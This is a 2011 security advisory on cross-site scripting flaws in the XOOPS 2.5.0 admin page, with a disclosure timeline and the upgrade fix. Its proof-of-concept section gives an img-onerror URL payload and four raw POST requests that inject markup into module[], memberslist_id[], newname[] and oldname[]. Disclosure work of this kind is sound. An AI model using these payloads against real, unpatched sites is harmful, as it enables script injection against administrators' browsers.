================================================== XOOPS 2.5.0 <= Cross Site Scripting Vulnerability ================================================== 1. OVERVIEW The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting. 2. BACKGROUND XOOPS is an acronym of eXtensible Object Oriented Portal System. It's the #1 Content Management System (CMS) project on www.sourceforge.net and a recipient of several awards, and constantly places as finalist in various CMS and Open Source competitions. It incorporates many modules such as forums, photo galleries, calendars, article management etc. 3. VULNERABILITY DESCRIPTION Several parameters such as module/module[], memberslist_id[], newname[], oldname[] were not properly sanitized upon submission to the /modules/system/admin.php url, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED XOOPS 2.5.0 and lower 5. PROOF-OF-CONCEPT/EXPLOIT Parameter: module http://localhost/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe Parameter: module[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: localhost Connection: close Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1">&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System [/REQUEST] Parameter: memberslist_id[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: localhost Connection: close Referer: http://localhost/xoops/modules/system/admin.php?fct=users&selgroups=2 Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 94 memberslist_id%5b%5d=">&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group [/REQUEST] Parameter: newname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: localhost Connection: close Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System"> [/REQUEST] Parameter: oldname[] [REQUEST] POST /xoops/modules/system/admin.php HTTP/1.1 Host: localhost Connection: close Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d; Content-Type: application/x-www-form-urlencoded Content-Length: 100 op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System">1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System [/REQUEST] 6. SOLUTION Upgrade to XOOPS 2.5.1 or higher 7. VENDOR XOOPS Development Team http://xoops.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-10: notified vendor 2011-03-16: vendor released fixed version 2011-03-18: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting Vendor Announcement: http://xoops.org/modules/news/article.php?storyid=5851 What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-03-18]